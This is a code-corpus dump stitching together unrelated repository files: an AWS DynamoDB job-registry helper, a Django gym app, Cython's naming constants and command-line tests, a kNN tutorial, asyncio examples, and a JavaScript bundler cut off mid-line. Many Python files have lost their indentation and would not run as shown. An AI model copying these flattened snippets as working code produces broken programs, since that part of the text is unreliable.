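# Hypothetical local invocation, for illustration only.
import os

os.environ["RUNNERS_TABLE"] = "gitlab-runner-job-mapping"  # assumed table name
os.environ["DEFAULT_RUNNER"] = "arn:aws:lambda:eu-west-1:123456789012:function:default-runner"

sample_event = {"detail": {"build_name": "unit-tests"}}

# handler(sample_event, None) queries DynamoDB for pk "job#unit-tests" and
# falls back to DEFAULT_RUNNER when no mapping exists.
```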
#### File: gitlab-runners-on-aws/HelperScripts/update_dynamodb_job_registry.py
```python
import argparse
import os
import json
import boto3
def update_dynamo_db(tablename):
    dynamodb = boto3.resource("dynamodb")
    table = dynamodb.Table(tablename)
    with open('job_runner_registry.json') as json_file:
        registry = json.load(json_file)
    for job in registry['jobs']:
        job_type = job['type']
        name = job['name']
        tags = job['tags']
        pk = f"job#{name}"
        sk = "tags#" + "#".join(tags)
        item = {
            "pk": pk,
            "sk": sk,
            "type": job_type,
        }
        if job_type == "LAMBDA":
            item["arn"] = job['lambdaArn']
        table.put_item(Item=item)
        print(f'Added Item: {item}')
def get_dynamodb_table(stackname: str) -> str:
cloudformation_client = boto3.client('cloudformation')
stack_resources = cloudformation_client.list_stack_resources(
StackName=stackname
)
for resource in stack_resources['StackResourceSummaries']:
if resource['ResourceType'] == 'AWS::DynamoDB::Table':
if resource['LogicalResourceId'] == 'GitLabJobTagsMapping':
return resource['PhysicalResourceId']
return ''
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--stackname', required=False,
help='The name of the CloudFormation Stack with base infrastructure.')
args = parser.parse_args()
stackname = args.stackname
dynamo_table = get_dynamodb_table(stackname)
print('Adding Mapping....')
update_dynamo_db(dynamo_table)
print('Done!')
if __name__ == '__main__':
main()
``` |
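The script reads `job_runner_registry.json` from the working directory; its expected shape can be inferred from `update_dynamo_db`. A registry with one Lambda-backed job might be generated like this (names, tags, types and the ARN are illustrative only):
```python
# Hypothetical registry file matching what update_dynamo_db() expects.
import json

registry = {
    "jobs": [
        {
            "name": "unit-tests",
            "type": "LAMBDA",
            "tags": ["python", "small"],
            "lambdaArn": "arn:aws:lambda:eu-west-1:123456789012:function:gitlab-runner-python",
        },
        {
            "name": "integration-tests",
            "type": "EC2",  # any non-LAMBDA type is stored without an arn
            "tags": ["docker", "large"],
        },
    ]
}

with open("job_runner_registry.json", "w") as registry_file:
    json.dump(registry, registry_file, indent=2)
```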
{
"source": "JimmyDuoc/duoc_2020_django",
"score": 2
} |
#### File: duoc_2020_django/clases/models.py
```python
from django.db import models
# Create your models here.
class Clase(models.Model):
title = models.CharField(max_length = 100, verbose_name = "Título")
image = models.ImageField(verbose_name = "Imagen",upload_to="clase")
instructor = models.CharField(max_length = 100, verbose_name = "Instructor")
created = models.DateTimeField(auto_now_add = True, verbose_name= "Fecha Creación")
updated = models.DateTimeField(auto_now = True, verbose_name= "Fecha Modificación")
class Meta:
verbose_name = "clase"
verbose_name_plural = "clases"
ordering = ['-updated','-created']
def __str__(self):
return self.title
```
#### File: duoc_2020_django/contacto/views.py
```python
from django.shortcuts import render,redirect
from django.urls import reverse
from .forms import ContactForm
from .models import Contacto
from django.core.mail import EmailMessage
# Create your views here.
def contacto(request):
contact_form = ContactForm()
if request.method == "POST":
contact_form = ContactForm(data = request.POST)
if contact_form.is_valid():
first_name = request.POST.get('first_name','')
last_name = request.POST.get('last_name','')
email = request.POST.get('email','')
phone = request.POST.get('phone','')
            Contacto.objects.create(first_name=first_name, last_name=last_name, email=email, phone=phone)
            message = EmailMessage(
                "DUOC GYM - Contacto {} {}".format(first_name, last_name),
                "Nombre: {} {}\nCorreo Electrónico: {}\nTeléfono: {}".format(first_name, last_name, email, phone),
                "<EMAIL>",
                ["<EMAIL>"],
                reply_to=[email]
            )
            try:
                message.send()
return redirect(reverse('contacto') + "?OK")
except:
return redirect(reverse('contacto') + "?FAIL")
return render(request,"contacto/contacto.html",{'form':contact_form})
```
#### File: duoc_2020_django/instructores/views.py
```python
from django.shortcuts import render
from .models import Instructor
# Create your views here.
def instructores(request):
instructores = Instructor.objects.all()
return render(request,"instructores/instructores.html",{'instructores':instructores})
``` |
{
"source": "jimmy-feng/cython",
"score": 2
} |
#### File: Cython/Compiler/Naming.py
```python
pyrex_prefix = "__pyx_"
codewriter_temp_prefix = pyrex_prefix + "t_"
temp_prefix = u"__cyt_"
pyunicode_identifier_prefix = pyrex_prefix + 'U'
builtin_prefix = pyrex_prefix + "builtin_"
arg_prefix = pyrex_prefix + "arg_"
funcdoc_prefix = pyrex_prefix + "doc_"
enum_prefix = pyrex_prefix + "e_"
func_prefix = pyrex_prefix + "f_"
func_prefix_api = pyrex_prefix + "api_f_"
pyfunc_prefix = pyrex_prefix + "pf_"
pywrap_prefix = pyrex_prefix + "pw_"
genbody_prefix = pyrex_prefix + "gb_"
gstab_prefix = pyrex_prefix + "getsets_"
prop_get_prefix = pyrex_prefix + "getprop_"
const_prefix = pyrex_prefix + "k_"
py_const_prefix = pyrex_prefix + "kp_"
label_prefix = pyrex_prefix + "L"
pymethdef_prefix = pyrex_prefix + "mdef_"
method_wrapper_prefix = pyrex_prefix + "specialmethod_"
methtab_prefix = pyrex_prefix + "methods_"
memtab_prefix = pyrex_prefix + "members_"
objstruct_prefix = pyrex_prefix + "obj_"
typeptr_prefix = pyrex_prefix + "ptype_"
prop_set_prefix = pyrex_prefix + "setprop_"
type_prefix = pyrex_prefix + "t_"
typeobj_prefix = pyrex_prefix + "type_"
var_prefix = pyrex_prefix + "v_"
varptr_prefix = pyrex_prefix + "vp_"
varptr_prefix_api = pyrex_prefix + "api_vp_"
wrapperbase_prefix= pyrex_prefix + "wrapperbase_"
pybuffernd_prefix = pyrex_prefix + "pybuffernd_"
pybufferstruct_prefix = pyrex_prefix + "pybuffer_"
vtable_prefix = pyrex_prefix + "vtable_"
vtabptr_prefix = pyrex_prefix + "vtabptr_"
vtabstruct_prefix = pyrex_prefix + "vtabstruct_"
unicode_vtabentry_prefix = pyrex_prefix + "Uvtabentry_"
# vtab entries aren't normally mangled,
# but punycode names sometimes start with numbers leading
# to a C syntax error
unicode_structmember_prefix = pyrex_prefix + "Umember_"
# as above -
# not normally mangled but punycode names cause specific problems
opt_arg_prefix = pyrex_prefix + "opt_args_"
convert_func_prefix = pyrex_prefix + "convert_"
closure_scope_prefix = pyrex_prefix + "scope_"
closure_class_prefix = pyrex_prefix + "scope_struct_"
lambda_func_prefix = pyrex_prefix + "lambda_"
module_is_main = pyrex_prefix + "module_is_main_"
defaults_struct_prefix = pyrex_prefix + "defaults"
dynamic_args_cname = pyrex_prefix + "dynamic_args"
interned_prefixes = {
'str': pyrex_prefix + "n_",
'int': pyrex_prefix + "int_",
'float': pyrex_prefix + "float_",
'tuple': pyrex_prefix + "tuple_",
'codeobj': pyrex_prefix + "codeobj_",
'slice': pyrex_prefix + "slice_",
'ustring': pyrex_prefix + "ustring_",
'umethod': pyrex_prefix + "umethod_",
}
ctuple_type_prefix = pyrex_prefix + "ctuple_"
args_cname = pyrex_prefix + "args"
nargs_cname = pyrex_prefix + "nargs"
kwvalues_cname = pyrex_prefix + "kwvalues"
generator_cname = pyrex_prefix + "generator"
sent_value_cname = pyrex_prefix + "sent_value"
pykwdlist_cname = pyrex_prefix + "pyargnames"
obj_base_cname = pyrex_prefix + "base"
builtins_cname = pyrex_prefix + "b"
preimport_cname = pyrex_prefix + "i"
moddict_cname = pyrex_prefix + "d"
dummy_cname = pyrex_prefix + "dummy"
filename_cname = pyrex_prefix + "filename"
modulename_cname = pyrex_prefix + "modulename"
filetable_cname = pyrex_prefix + "f"
intern_tab_cname = pyrex_prefix + "intern_tab"
kwds_cname = pyrex_prefix + "kwds"
lineno_cname = pyrex_prefix + "lineno"
clineno_cname = pyrex_prefix + "clineno"
cfilenm_cname = pyrex_prefix + "cfilenm"
local_tstate_cname = pyrex_prefix + "tstate"
module_cname = pyrex_prefix + "m"
moddoc_cname = pyrex_prefix + "mdoc"
methtable_cname = pyrex_prefix + "methods"
retval_cname = pyrex_prefix + "r"
reqd_kwds_cname = pyrex_prefix + "reqd_kwds"
self_cname = pyrex_prefix + "self"
stringtab_cname = pyrex_prefix + "string_tab"
vtabslot_cname = pyrex_prefix + "vtab"
c_api_tab_cname = pyrex_prefix + "c_api_tab"
gilstate_cname = pyrex_prefix + "state"
skip_dispatch_cname = pyrex_prefix + "skip_dispatch"
empty_tuple = pyrex_prefix + "empty_tuple"
empty_bytes = pyrex_prefix + "empty_bytes"
empty_unicode = pyrex_prefix + "empty_unicode"
print_function = pyrex_prefix + "print"
print_function_kwargs = pyrex_prefix + "print_kwargs"
cleanup_cname = pyrex_prefix + "module_cleanup"
pymoduledef_cname = pyrex_prefix + "moduledef"
pymoduledef_slots_cname = pyrex_prefix + "moduledef_slots"
pymodinit_module_arg = pyrex_prefix + "pyinit_module"
pymodule_create_func_cname = pyrex_prefix + "pymod_create"
pymodule_exec_func_cname = pyrex_prefix + "pymod_exec"
optional_args_cname = pyrex_prefix + "optional_args"
import_star = pyrex_prefix + "import_star"
import_star_set = pyrex_prefix + "import_star_set"
outer_scope_cname= pyrex_prefix + "outer_scope"
cur_scope_cname = pyrex_prefix + "cur_scope"
enc_scope_cname = pyrex_prefix + "enc_scope"
frame_cname = pyrex_prefix + "frame"
frame_code_cname = pyrex_prefix + "frame_code"
binding_cfunc = pyrex_prefix + "binding_PyCFunctionType"
fused_func_prefix = pyrex_prefix + 'fuse_'
quick_temp_cname = pyrex_prefix + "temp" # temp variable for quick'n'dirty temping
tp_dict_version_temp = pyrex_prefix + "tp_dict_version"
obj_dict_version_temp = pyrex_prefix + "obj_dict_version"
type_dict_guard_temp = pyrex_prefix + "type_dict_guard"
cython_runtime_cname = pyrex_prefix + "cython_runtime"
global_code_object_cache_find = pyrex_prefix + 'find_code_object'
global_code_object_cache_insert = pyrex_prefix + 'insert_code_object'
genexpr_id_ref = 'genexpr'
freelist_name = 'freelist'
freecount_name = 'freecount'
line_c_macro = "__LINE__"
file_c_macro = "__FILE__"
extern_c_macro = pyrex_prefix.upper() + "EXTERN_C"
exc_type_name = pyrex_prefix + "exc_type"
exc_value_name = pyrex_prefix + "exc_value"
exc_tb_name = pyrex_prefix + "exc_tb"
exc_lineno_name = pyrex_prefix + "exc_lineno"
parallel_exc_type = pyrex_prefix + "parallel_exc_type"
parallel_exc_value = pyrex_prefix + "parallel_exc_value"
parallel_exc_tb = pyrex_prefix + "parallel_exc_tb"
parallel_filename = pyrex_prefix + "parallel_filename"
parallel_lineno = pyrex_prefix + "parallel_lineno"
parallel_clineno = pyrex_prefix + "parallel_clineno"
parallel_why = pyrex_prefix + "parallel_why"
exc_vars = (exc_type_name, exc_value_name, exc_tb_name)
api_name = pyrex_prefix + "capi__"
h_guard_prefix = "__PYX_HAVE__"
api_guard_prefix = "__PYX_HAVE_API__"
api_func_guard = "__PYX_HAVE_API_FUNC_"
PYX_NAN = "__PYX_NAN()"
def py_version_hex(major, minor=0, micro=0, release_level=0, release_serial=0):
return (major << 24) | (minor << 16) | (micro << 8) | (release_level << 4) | (release_serial)
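# Illustrative note (not part of the original file): the layout matches CPython's
# PY_VERSION_HEX, e.g. Python 3.10.2 final (release level 0xF, serial 0) gives
# py_version_hex(3, 10, 2, 0xF, 0) == 0x030A02F0.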
```
#### File: Compiler/Tests/TestCmdLine.py
```python
import os
import sys
import copy
from unittest import TestCase
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
from .. import Options
from ..CmdLine import parse_command_line
class CmdLineParserTest(TestCase):
def setUp(self):
backup = {}
for name, value in vars(Options).items():
# we need a deep copy of _directive_defaults, because they can be changed
if name == '_directive_defaults':
value = copy.deepcopy(value)
backup[name] = value
self._options_backup = backup
def tearDown(self):
no_value = object()
for name, orig_value in self._options_backup.items():
if getattr(Options, name, no_value) != orig_value:
setattr(Options, name, orig_value)
# strip Options from new keys that might have been added:
for name in vars(Options).keys():
if name not in self._options_backup:
delattr(Options, name)
def check_default_global_options(self, white_list=[]):
no_value = object()
for name, orig_value in self._options_backup.items():
if name not in white_list:
self.assertEqual(getattr(Options, name, no_value), orig_value, msg="error in option " + name)
def check_default_options(self, options, white_list=[]):
default_options = Options.CompilationOptions(Options.default_options)
no_value = object()
for name in default_options.__dict__.keys():
if name not in white_list:
self.assertEqual(getattr(options, name, no_value), getattr(default_options, name), msg="error in option " + name)
def test_short_options(self):
options, sources = parse_command_line([
'-V', '-l', '-+', '-t', '-v', '-v', '-v', '-p', '-D', '-a', '-3',
])
self.assertFalse(sources)
self.assertTrue(options.show_version)
self.assertTrue(options.use_listing_file)
self.assertTrue(options.cplus)
self.assertTrue(options.timestamps)
self.assertTrue(options.verbose >= 3)
self.assertTrue(Options.embed_pos_in_docstring)
self.assertFalse(Options.docstrings)
self.assertTrue(Options.annotate)
self.assertEqual(options.language_level, 3)
options, sources = parse_command_line([
'-f', '-2', 'source.pyx',
])
self.assertTrue(sources)
self.assertTrue(len(sources) == 1)
self.assertFalse(options.timestamps)
self.assertEqual(options.language_level, 2)
def test_long_options(self):
options, sources = parse_command_line([
'--version', '--create-listing', '--cplus', '--embed', '--timestamps',
'--verbose', '--verbose', '--verbose',
'--embed-positions', '--no-docstrings', '--annotate', '--lenient',
])
self.assertFalse(sources)
self.assertTrue(options.show_version)
self.assertTrue(options.use_listing_file)
self.assertTrue(options.cplus)
self.assertEqual(Options.embed, 'main')
self.assertTrue(options.timestamps)
self.assertTrue(options.verbose >= 3)
self.assertTrue(Options.embed_pos_in_docstring)
self.assertFalse(Options.docstrings)
self.assertTrue(Options.annotate)
self.assertFalse(Options.error_on_unknown_names)
self.assertFalse(Options.error_on_uninitialized)
options, sources = parse_command_line([
'--force', 'source.pyx',
])
self.assertTrue(sources)
self.assertTrue(len(sources) == 1)
self.assertFalse(options.timestamps)
def test_options_with_values(self):
options, sources = parse_command_line([
'--embed=huhu',
'-I/test/include/dir1', '--include-dir=/test/include/dir2',
'--include-dir', '/test/include/dir3',
'--working=/work/dir',
'source.pyx',
'--output-file=/output/dir',
'--pre-import=/pre/import',
'--cleanup=3',
'--annotate-coverage=cov.xml',
'--gdb-outdir=/gdb/outdir',
'--directive=wraparound=false',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'huhu')
self.assertEqual(options.include_path, ['/test/include/dir1', '/test/include/dir2', '/test/include/dir3'])
self.assertEqual(options.working_path, '/work/dir')
self.assertEqual(options.output_file, '/output/dir')
self.assertEqual(Options.pre_import, '/pre/import')
self.assertEqual(Options.generate_cleanup_code, 3)
self.assertTrue(Options.annotate)
self.assertEqual(Options.annotate_coverage_xml, 'cov.xml')
self.assertTrue(options.gdb_debug)
self.assertEqual(options.output_dir, '/gdb/outdir')
self.assertEqual(options.compiler_directives['wraparound'], False)
def test_embed_before_positional(self):
options, sources = parse_command_line([
'--embed',
'source.pyx',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'main')
def test_two_embeds(self):
options, sources = parse_command_line([
'--embed', '--embed=huhu',
'source.pyx',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'huhu')
def test_two_embeds2(self):
options, sources = parse_command_line([
'--embed=huhu', '--embed',
'source.pyx',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'main')
def test_no_annotate(self):
options, sources = parse_command_line([
'--embed=huhu', 'source.pyx'
])
self.assertFalse(Options.annotate)
def test_annotate_short(self):
options, sources = parse_command_line([
'-a',
'source.pyx',
])
self.assertEqual(Options.annotate, 'default')
def test_annotate_long(self):
options, sources = parse_command_line([
'--annotate',
'source.pyx',
])
self.assertEqual(Options.annotate, 'default')
def test_annotate_fullc(self):
options, sources = parse_command_line([
'--annotate-fullc',
'source.pyx',
])
self.assertEqual(Options.annotate, 'fullc')
def test_short_w(self):
options, sources = parse_command_line([
'-w', 'my_working_path',
'source.pyx'
])
self.assertEqual(options.working_path, 'my_working_path')
self.check_default_global_options()
self.check_default_options(options, ['working_path'])
def test_short_o(self):
options, sources = parse_command_line([
'-o', 'my_output',
'source.pyx'
])
self.assertEqual(options.output_file, 'my_output')
self.check_default_global_options()
self.check_default_options(options, ['output_file'])
def test_short_z(self):
options, sources = parse_command_line([
'-z', 'my_preimport',
'source.pyx'
])
self.assertEqual(Options.pre_import, 'my_preimport')
self.check_default_global_options(['pre_import'])
self.check_default_options(options)
def test_convert_range(self):
options, sources = parse_command_line([
'--convert-range',
'source.pyx'
])
self.assertEqual(Options.convert_range, True)
self.check_default_global_options(['convert_range'])
self.check_default_options(options)
def test_line_directives(self):
options, sources = parse_command_line([
'--line-directives',
'source.pyx'
])
self.assertEqual(options.emit_linenums, True)
self.check_default_global_options()
self.check_default_options(options, ['emit_linenums'])
def test_no_c_in_traceback(self):
options, sources = parse_command_line([
'--no-c-in-traceback',
'source.pyx'
])
self.assertEqual(options.c_line_in_traceback, False)
self.check_default_global_options()
self.check_default_options(options, ['c_line_in_traceback'])
def test_gdb(self):
options, sources = parse_command_line([
'--gdb',
'source.pyx'
])
self.assertEqual(options.gdb_debug, True)
self.assertEqual(options.output_dir, os.curdir)
self.check_default_global_options()
self.check_default_options(options, ['gdb_debug', 'output_dir'])
def test_3str(self):
options, sources = parse_command_line([
'--3str',
'source.pyx'
])
self.assertEqual(options.language_level, '3str')
self.check_default_global_options()
self.check_default_options(options, ['language_level'])
def test_capi_reexport_cincludes(self):
options, sources = parse_command_line([
'--capi-reexport-cincludes',
'source.pyx'
])
self.assertEqual(options.capi_reexport_cincludes, True)
self.check_default_global_options()
self.check_default_options(options, ['capi_reexport_cincludes'])
def test_fast_fail(self):
options, sources = parse_command_line([
'--fast-fail',
'source.pyx'
])
self.assertEqual(Options.fast_fail, True)
self.check_default_global_options(['fast_fail'])
self.check_default_options(options)
def test_cimport_from_pyx(self):
options, sources = parse_command_line([
'--cimport-from-pyx',
'source.pyx'
])
self.assertEqual(Options.cimport_from_pyx, True)
self.check_default_global_options(['cimport_from_pyx'])
self.check_default_options(options)
def test_Werror(self):
options, sources = parse_command_line([
'-Werror',
'source.pyx'
])
self.assertEqual(Options.warning_errors, True)
self.check_default_global_options(['warning_errors'])
self.check_default_options(options)
def test_warning_errors(self):
options, sources = parse_command_line([
'--warning-errors',
'source.pyx'
])
self.assertEqual(Options.warning_errors, True)
self.check_default_global_options(['warning_errors'])
self.check_default_options(options)
def test_Wextra(self):
options, sources = parse_command_line([
'-Wextra',
'source.pyx'
])
self.assertEqual(options.compiler_directives, Options.extra_warnings)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_warning_extra(self):
options, sources = parse_command_line([
'--warning-extra',
'source.pyx'
])
self.assertEqual(options.compiler_directives, Options.extra_warnings)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_old_style_globals(self):
options, sources = parse_command_line([
'--old-style-globals',
'source.pyx'
])
self.assertEqual(Options.old_style_globals, True)
self.check_default_global_options(['old_style_globals'])
self.check_default_options(options)
def test_directive_multiple(self):
options, source = parse_command_line([
'-X', 'cdivision=True',
'-X', 'c_string_type=bytes',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], True)
self.assertEqual(options.compiler_directives['c_string_type'], 'bytes')
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_multiple_v2(self):
options, source = parse_command_line([
'-X', 'cdivision=True,c_string_type=bytes',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], True)
self.assertEqual(options.compiler_directives['c_string_type'], 'bytes')
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_value_yes(self):
options, source = parse_command_line([
'-X', 'cdivision=YeS',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], True)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_value_no(self):
options, source = parse_command_line([
'-X', 'cdivision=no',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], False)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_value_invalid(self):
self.assertRaises(ValueError, parse_command_line, [
'-X', 'cdivision=sadfasd',
'source.pyx'
])
def test_directive_key_invalid(self):
self.assertRaises(ValueError, parse_command_line, [
'-X', 'abracadabra',
'source.pyx'
])
def test_directive_no_value(self):
self.assertRaises(ValueError, parse_command_line, [
'-X', 'cdivision',
'source.pyx'
])
def test_compile_time_env_short(self):
options, source = parse_command_line([
'-E', 'MYSIZE=10',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_compile_time_env_long(self):
options, source = parse_command_line([
'--compile-time-env', 'MYSIZE=10',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_compile_time_env_multiple(self):
options, source = parse_command_line([
'-E', 'MYSIZE=10', '-E', 'ARRSIZE=11',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.assertEqual(options.compile_time_env['ARRSIZE'], 11)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_compile_time_env_multiple_v2(self):
options, source = parse_command_line([
'-E', 'MYSIZE=10,ARRSIZE=11',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.assertEqual(options.compile_time_env['ARRSIZE'], 11)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_option_first(self):
options, sources = parse_command_line(['-V', 'file.pyx'])
self.assertEqual(sources, ['file.pyx'])
def test_file_inbetween(self):
options, sources = parse_command_line(['-V', 'file.pyx', '-a'])
self.assertEqual(sources, ['file.pyx'])
def test_option_trailing(self):
options, sources = parse_command_line(['file.pyx', '-V'])
self.assertEqual(sources, ['file.pyx'])
def test_multiple_files(self):
options, sources = parse_command_line([
'file1.pyx', '-V',
'file2.pyx', '-a',
'file3.pyx'
])
self.assertEqual(sources, ['file1.pyx', 'file2.pyx', 'file3.pyx'])
def test_debug_flags(self):
options, sources = parse_command_line([
'--debug-disposal-code', '--debug-coercion',
'file3.pyx'
])
from Cython.Compiler import DebugFlags
for name in ['debug_disposal_code', 'debug_temp_alloc', 'debug_coercion']:
self.assertEqual(getattr(DebugFlags, name), name in ['debug_disposal_code', 'debug_coercion'])
setattr(DebugFlags, name, 0) # restore original value
def test_gdb_overwrites_gdb_outdir(self):
options, sources = parse_command_line([
'--gdb-outdir=my_dir', '--gdb',
'file3.pyx'
])
self.assertEqual(options.gdb_debug, True)
self.assertEqual(options.output_dir, os.curdir)
self.check_default_global_options()
self.check_default_options(options, ['gdb_debug', 'output_dir'])
def test_gdb_first(self):
options, sources = parse_command_line([
'--gdb', '--gdb-outdir=my_dir',
'file3.pyx'
])
self.assertEqual(options.gdb_debug, True)
self.assertEqual(options.output_dir, 'my_dir')
self.check_default_global_options()
self.check_default_options(options, ['gdb_debug', 'output_dir'])
def test_coverage_overwrites_annotation(self):
options, sources = parse_command_line([
'--annotate-fullc', '--annotate-coverage=my.xml',
'file3.pyx'
])
self.assertEqual(Options.annotate, True)
self.assertEqual(Options.annotate_coverage_xml, 'my.xml')
self.check_default_global_options(['annotate', 'annotate_coverage_xml'])
self.check_default_options(options)
def test_coverage_first(self):
options, sources = parse_command_line([
'--annotate-coverage=my.xml', '--annotate-fullc',
'file3.pyx'
])
self.assertEqual(Options.annotate, 'fullc')
self.assertEqual(Options.annotate_coverage_xml, 'my.xml')
self.check_default_global_options(['annotate', 'annotate_coverage_xml'])
self.check_default_options(options)
def test_annotate_first_fullc_second(self):
options, sources = parse_command_line([
'--annotate', '--annotate-fullc',
'file3.pyx'
])
self.assertEqual(Options.annotate, 'fullc')
self.check_default_global_options(['annotate'])
self.check_default_options(options)
def test_annotate_fullc_first(self):
options, sources = parse_command_line([
'--annotate-fullc', '--annotate',
'file3.pyx'
])
self.assertEqual(Options.annotate, 'default')
self.check_default_global_options(['annotate'])
self.check_default_options(options)
def test_warning_extra_dont_overwrite(self):
options, sources = parse_command_line([
'-X', 'cdivision=True',
'--warning-extra',
'-X', 'c_string_type=bytes',
'source.pyx'
])
self.assertTrue(len(options.compiler_directives), len(Options.extra_warnings) + 1)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_errors(self):
def error(*args):
old_stderr = sys.stderr
stderr = sys.stderr = StringIO()
try:
self.assertRaises(SystemExit, parse_command_line, list(args))
finally:
sys.stderr = old_stderr
self.assertTrue(stderr.getvalue())
error('-1')
error('-I')
error('--version=-a')
error('--version=--annotate=true')
error('--working')
error('--verbose=1')
error('--verbose=1')
error('--cleanup')
error('--debug-disposal-code-wrong-name', 'file3.pyx')
``` |
{
"source": "JimmyFW/stop-making-sense-julia",
"score": 3
} |
#### File: JimmyFW/stop-making-sense-julia/knn_python_custom_tutorial.py
```python
import pandas as pd
from skimage.io import imread
import numpy as np
def read_data(typeData, labelsInfo, imageSize, path):
#Intialize x matrix
x = np.zeros((labelsInfo.shape[0], imageSize))
for (index, idImage) in enumerate(labelsInfo["ID"]):
#Read image file
nameFile = "{0}/{1}Resized/{2}.Bmp".format(path, typeData, idImage)
img = imread(nameFile, as_grey=True)
x[index, :] = np.reshape(img, (1, imageSize))
return x
imageSize = 400 # 20 x 20 pixels
#Set location of data files , folders
path = ...
labelsInfoTrain = pd.read_csv("{0}/trainLabels.csv".format(path))
#Read training matrix
xTrain = read_data("train", labelsInfoTrain, imageSize, path)
#Read information about test data ( IDs ).
labelsInfoTest = pd.read_csv("{0}/sampleSubmission.csv".format(path))
#Read test matrix
xTest = read_data("test", labelsInfoTest, imageSize, path)
yTrain = list(map(ord, labelsInfoTrain["Class"]))
# Defining main functions
def euclidean_distance (a, b):
dif = a - b
return dif.dot(dif)
def get_k_nearest_neighbors(x, i, k):
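    # Rank every row of x by squared distance to row i and keep the k closest,
    # skipping position 0 (the point itself, at distance 0) so the same routine
    # can be reused for leave-one-out cross-validation.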
imageI = x[i,:]
distances = [euclidean_distance(imageI, x[j,:]) for j in xrange(x.shape[0])]
sortedNeighbors = np.argsort(distances)
kNearestNeighbors = sortedNeighbors[1:(k+1)]
return kNearestNeighbors
def assign_label(x, y, k, i):
kNearestNeighbors = get_k_nearest_neighbors(x, i, k)
counts = {}
highestCount = 0
mostPopularLabel = 0
for n in kNearestNeighbors:
labelOfN = y[n]
if labelOfN not in counts :
counts[labelOfN] = 0
counts[labelOfN] += 1
if counts[labelOfN] > highestCount :
highestCount = counts[labelOfN]
mostPopularLabel = labelOfN
return mostPopularLabel
# Running LOOF-CV (leave-one-out cross-validation) with 1NN sequentially
import time
start = time.time()
k=1
yPredictions = [assign_label(xTrain, yTrain, k, i) for i in xrange(xTrain.shape[0])]
print time.time() - start, "seconds elapsed"
``` |
{
"source": "jimmygizmo/zerogames",
"score": 3
} |
#### File: zerogames/medusa/duet-asyncawait.py
```python
import asyncio
# showing asyncio async await
async def annie():
print('Anything you can do, I can do better.')
print(' I can do anything better than you.')
await frank()
print('Yes, I can!')
await frank()
print('Yes, I can!')
await frank()
print('Yes, I ca. Yes, I can!')
async def frank():
print("No, you can't!")
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.ensure_future(annie()))
##
#
```
#### File: zerogames/medusa/xmedusa.py
```python
import asyncio
import random
async def mainCoroutineSimple():
print('Simple coroutine')
async def mainCoroutineFancy(id):
process_time = random.randint(1,5)
await asyncio.sleep(process_time)
print(f"Fancy coroutine: {id} done after {process_time} seconds.")
async def mainCoroutineMarvelous():
print('Marvelous coroutine')
async def main():
tasks = []
for i in range(10):
tasks.append(asyncio.ensure_future(mainCoroutineFancy(i)))
await asyncio.gather(*tasks)
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
##
#
``` |
{
"source": "JimmyHaglund/JHM_Javascript_Game_Engine",
"score": 3
} |
#### File: Caprica/Source/Build.py
```python
import os
from os import walk
def bundle(root, outfile):
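    # Concatenate every .js file under `root` (including subdirectories) into a
    # single `outfile`, writing files whose dependency header is already satisfied
    # before the files that depend on them.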
contents = walk(root)
open(outfile, 'w+').close()
add_files_in_directory(root, outfile)
for root, dirs, files in contents:
for dir in dirs:
print("\n" + dir)
path = os.path.join(root, dir)
add_files_in_directory(path, outfile)
def add_files_in_directory(dirpath, outpath):
dependents = []
readfiles = []
with open(outpath, "a") as outfile:
for filename in os.listdir(dirpath):
if filename[-2:] != "js":
continue
path = os.path.join(dirpath, filename)
if (has_unresolved_dependency(path, readfiles)):
print("Unresolved dependency for file " + filename)
dependents.append(path)
continue
contents = read_file(path)
print("Reading " + filename)
outfile.write(contents + "\n")
readfiles.append(filename[:-3])
add_dependents(dependents, readfiles, outpath)
def add_dependents(dependents, readfiles, outpath):
    if len(dependents) == 0:
return
with open(outpath, "a") as outfile:
for dependentpath in dependents:
filename = os.path.basename(dependentpath)
if (has_unresolved_dependency(dependentpath, readfiles)):
print("Still unresolved dependency for " + filename)
continue
contents = read_file(dependentpath)
print("Reading " + filename)
outfile.write(contents + "\n")
            readfiles.append(filename[:-3])
dependents.remove(dependentpath)
def has_unresolved_dependency(path, readfiles):
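    # The first line of each .js file is expected to be a declaration of the form
    # "// Dependencies: NameA NameB"; a file is unresolved until every listed name
    # has already been written to the bundle.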
with open (path, "r") as file:
dependencydeclaration = file.readline()
dependencies = get_dependencies(dependencydeclaration)
return dependency_unresolved(dependencies, readfiles)
def dependency_unresolved(dependencies, readfiles):
for dependency in dependencies:
if dependency not in readfiles:
return 1
return 0
def read_file(file_path):
with open(file_path, 'r') as target:
return target.read()
def get_dependencies(dependencystring):
items = dependencystring.split()
if not "Dependencies:" in items:
return []
items.remove("//")
items.remove("Dependencies:")
return items
if __name__ == '__main__':
